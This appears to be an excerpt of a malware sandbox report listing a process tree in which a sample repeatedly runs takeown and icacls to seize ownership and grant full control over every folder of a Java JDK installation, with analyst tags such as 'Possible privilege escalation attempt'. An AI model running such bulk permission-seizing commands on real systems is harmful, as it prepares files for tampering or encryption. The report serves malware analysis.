C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\db\lib" /a2⤵PID:356
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\db\lib" /grant Administrators:F2⤵PID:2192
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\include" /a2⤵PID:984
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\include" /grant Administrators:F2⤵PID:1876
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\include\win32" /a2⤵PID:3032
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\include\win32" /grant Administrators:F2⤵PID:1588
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge" /a2⤵PID:928
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge" /grant Administrators:F2⤵PID:1448
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre" /a2⤵PID:1992
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre" /grant Administrators:F2⤵PID:2364
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\bin" /a2⤵PID:316
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\bin" /grant Administrators:F2⤵PID:2028
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe" /a2⤵PID:692
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe" /grant Administrators:F2⤵PID:2776
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin" /a2⤵PID:1412
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin" /grant Administrators:F2⤵PID:1216
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2" /a2⤵PID:2744
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2" /grant Administrators:F2⤵PID:448
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server" /a2⤵PID:2616
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server" /grant Administrators:F2⤵PID:2112
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib" /a2⤵PID:2336
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib" /grant Administrators:F2⤵PID:2536
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe" /a2⤵PID:2132
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe" /grant Administrators:F2⤵PID:2064
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64" /a2⤵PID:2160
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64" /grant Administrators:F2⤵PID:1488
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet" /a2⤵PID:2800
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet" /grant Administrators:F2⤵PID:296
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm" /a2⤵PID:2388
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm" /grant Administrators:F2⤵PID:1880
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy" /a2⤵PID:1292
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy" /grant Administrators:F2⤵PID:644
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext" /a2⤵
- Possible privilege escalation attempt
PID:1388
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext" /grant Administrators:F2⤵PID:2980
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts" /a2⤵PID:948
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts" /grant Administrators:F2⤵PID:2704
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\images" /a2⤵PID:2636
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\images" /grant Administrators:F2⤵PID:1688
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors" /a2⤵PID:1492
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors" /grant Administrators:F2⤵
- Possible privilege escalation attempt
PID:2516
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr" /a2⤵PID:2652
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr" /grant Administrators:F2⤵PID:3068
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\management" /a2⤵PID:2412
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\management" /grant Administrators:F2⤵PID:2116
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\security" /a2⤵PID:752
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\security" /grant Administrators:F2⤵PID:1472
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi" /a2⤵PID:2796
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi" /grant Administrators:F2⤵PID:2000
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa" /a2⤵
- Possible privilege escalation attempt
PID:2596
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa" /grant Administrators:F2⤵
- Modifies file permissions
PID:1632
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America" /a2⤵PID:2180
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America" /grant Administrators:F2⤵PID:1944
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina" /a2⤵
- Possible privilege escalation attempt
PID:1532
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina" /grant Administrators:F2⤵PID:3012
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana" /a2⤵
- Possible privilege escalation attempt
PID:600
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana" /grant Administrators:F2⤵PID:2328
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky" /a2⤵PID:332
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky" /grant Administrators:F2⤵
- Possible privilege escalation attempt
PID:2184
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota" /a2⤵PID:2432
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota" /grant Administrators:F2⤵PID:2548
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica" /a2⤵PID:1412
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica" /grant Administrators:F2⤵PID:1624
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia" /a2⤵PID:2464
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia" /grant Administrators:F2⤵PID:2536
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic" /a2⤵PID:2608
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic" /grant Administrators:F2⤵
- Modifies file permissions
PID:2900
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia" /a2⤵PID:696
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia" /grant Administrators:F2⤵PID:1612
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc" /a2⤵PID:1168
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc" /grant Administrators:F2⤵PID:2724
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe" /a2⤵PID:2132
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe" /grant Administrators:F2⤵PID:992
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian" /a2⤵PID:1972
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian" /grant Administrators:F2⤵PID:2016
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific" /a2⤵PID:2856
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific" /grant Administrators:F2⤵PID:1852
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV" /a2⤵PID:2660
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV" /grant Administrators:F2⤵PID:2372
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib" /a2⤵PID:2440
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib" /grant Administrators:F2⤵PID:2704
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol" /a2⤵PID:1404
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol" /grant Administrators:F2⤵PID:2188
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration" /a2⤵PID:1460
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration" /grant Administrators:F2⤵PID:2652
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator" /a2⤵
- Modifies file permissions
PID:1952
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator" /grant Administrators:F2⤵
- Modifies file permissions
PID:1188
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update" /a2⤵PID:2284
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update" /grant Administrators:F2⤵PID:1884
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins" /a2⤵PID:2256
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins" /grant Administrators:F2⤵PID:756
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features" /a2⤵PID:2000
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features" /grant Administrators:F2⤵PID:1456
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303" /a2⤵PID:2484
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303" /grant Administrators:F2⤵PID:2012
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303" /a2⤵PID:888
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303" /grant Administrators:F2⤵PID:2180
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303" /a2⤵PID:2572
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303" /grant Administrators:F2⤵PID:2368
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303" /a2⤵PID:2332
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303" /grant Administrators:F2⤵PID:2444
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303" /a2⤵PID:760
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303" /grant Administrators:F2⤵PID:972
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303" /a2⤵PID:2432
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303" /grant Administrators:F2⤵PID:2920
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303" /a2⤵PID:2672
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303" /grant Administrators:F2⤵PID:2400
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002" /a2⤵PID:2900
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002" /grant Administrators:F2⤵PID:1912
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002" /a2⤵PID:2452
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002" /grant Administrators:F2⤵PID:780
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033" /a2⤵PID:208
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033" /grant Administrators:F2⤵PID:2160
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF" /a2⤵PID:2600
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF" /grant Administrators:F2⤵PID:1916
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444" /a2⤵PID:992
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444" /grant Administrators:F2⤵PID:228
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF" /a2⤵
- Possible privilege escalation attempt
PID:2832
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF" /grant Administrators:F2⤵PID:1572
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444" /a2⤵
- Possible privilege escalation attempt
PID:2372
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444" /grant Administrators:F2⤵PID:1688
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF" /a2⤵PID:2980
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF" /grant Administrators:F2⤵
- Possible privilege escalation attempt
PID:1568
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444" /a2⤵PID:900
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444" /grant Administrators:F2⤵PID:1824
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF" /a2⤵PID:2236
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF" /grant Administrators:F2⤵PID:2412
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444" /a2⤵
- Modifies file permissions
PID:1952
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444" /grant Administrators:F2⤵PID:2956
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF" /a2⤵PID:1552
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF" /grant Administrators:F2⤵PID:2052
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444" /a2⤵PID:756
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444" /grant Administrators:F2⤵PID:2596
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF" /a2⤵PID:2448
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF" /grant Administrators:F2⤵PID:2612
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444" /a2⤵PID:2568
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444" /grant Administrators:F2⤵PID:496
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF" /a2⤵PID:2528
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF" /grant Administrators:F2⤵PID:2708
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043" /a2⤵PID:2484
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043" /grant Administrators:F2⤵PID:1700
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF" /a2⤵PID:2112
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF" /grant Administrators:F2⤵PID:896
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043" /a2⤵PID:2096
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043" /grant Administrators:F2⤵PID:1212
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF" /a2⤵PID:1648
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF" /grant Administrators:F2⤵PID:2888
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116" /a2⤵PID:2456
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116" /grant Administrators:F2⤵PID:2536
-
-
